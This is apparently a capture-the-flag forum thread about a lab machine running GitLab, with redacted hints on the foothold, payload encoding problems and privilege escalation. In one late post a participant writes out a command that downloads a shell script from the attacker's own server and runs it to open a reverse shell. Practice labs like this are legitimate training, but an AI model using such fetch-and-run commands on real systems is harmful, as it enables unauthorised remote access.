Official Laboratory Discussion

Felt like I was on the verge of getting RCE but got so stuck I tried resetting the machine as a last resort, and now only 502 errors like others have mentioned. Is there a trick to getting around those?

Switched VPNs and I’m back in business. Although it doesn’t fix it for anyone on that original VPN.

I can get some file exfiltration, but not much more. Do I need to set up a local G***** instance and poke around it to see what files to take or is that a time waste? Cheers.

EDIT: afaik I can only grab files that the g*****-w** user has perms to view (or one of the g*****-xxxxx users)

@andrenl said:

Got a foothold and landed on a limited Dr C*****.
Any nudges on how to get user?

Hint:
Google basic commands research on G****-r**** C******.
You should think what to do with D *****
if you need something PM

Spoiler Removed

Hi Guys, There must be another trick than using R**** C******.

@mohsinhakak said:

Whoops, GitLab is taking too much time to respond. Been like this for days, any information on how to get rid of this please PM, thanks

Same here, it worked great for me before

Hmm, I leaked the secret, but I can’t get r*** to run my payload. I tried adding spaces to remove ='s as 0xc45 suggested but still no luck. Any tips?

Stuck on the foothold. I’ve found the g** URL and made an account. Can create a project and get it to call a r****r on my local g***** instance, but haven’t found a way to turn this into anything yet. Searched for CVEs but haven’t found any that are useful. As usual I may have missed something obvious?

Rooted :wink:

That was an easy box?
I don’t think so…
Thanks, @n3ph0s for the nudge on foothold.

Feel free to PM if any help is needed.

Guys, I’m stuck in the beginning. Can someone DM me a hint to start with? I did a service scan and I can’t get anywhere around the website.

Rooted!

Why am I so distracted and overlook things???
Contrary to everyone, the user was easier than the root!

Might be luck but, things just went the right path (even not using docker prior to this)…

foot:

  • look carefully (enumeration)
  • Some things (do… cof… mains) are just a pot full of honey…
  • find the version and build piece by piece with that (find that POC)
  • When exploiting, if the payload fails, check what was said about the “=” symbols (I did not have that issue tho)
  • remember what was also said: the machine might not have the bins you want/need

user:

  • It was already mentioned (if you can’t crack/find, just hammer the guts and reset the machine!)

root:

  • Enum (latest) might help you over Peas on this one
  • when the spicy thing is found, if you look closely, you just need the initial procedures of RE to see it

If nudges needed, honk the horn on pm

Thought I’d have a nice little time on this box, but it seems to be 502’ing everything for me after stops/starts/resets :frowning:

Edit: I had to change servers for it to work.

Actually got a shell but no idea about how to find the user flag.

Please send me some nudges.

I’ve reached the gi**ab page, registered an account, discovered the L_I, but can’t understand how to get R_E. I’ve read about ss*f but it says import url is blocked. Am I on the right path? I’m blocked …

Spoiler Removed

This box made me sweat. There are still some mysteries that I have not solved: why some payload works for one person and not the other …

I spent a lot of time setting up the env.

It is not an easy box for me.

If you need help, PM.

Yikes, this is not an easy box for me.

I thought I had some plain ruby working for generating the payload, but it’s just not accepted. The ‘other’ more convoluted doc*** route has also failed to generate a payload which works.

Hint for those struggling with a foothold: If you get a “Something went wrong” error, try a different bin

What I suggest for those with payload problems is: download a shell script from your local python http.server to perform the reverse shell; special symbols may cause problems.

This approach got me good: wget "yourserver/rev.sh" && chmod +x rev.sh && ./rev.sh

Trying the bash rev shell directly did not work for me, and the one I said above was reliable all the time (used it like 6 times due to resets and stuff).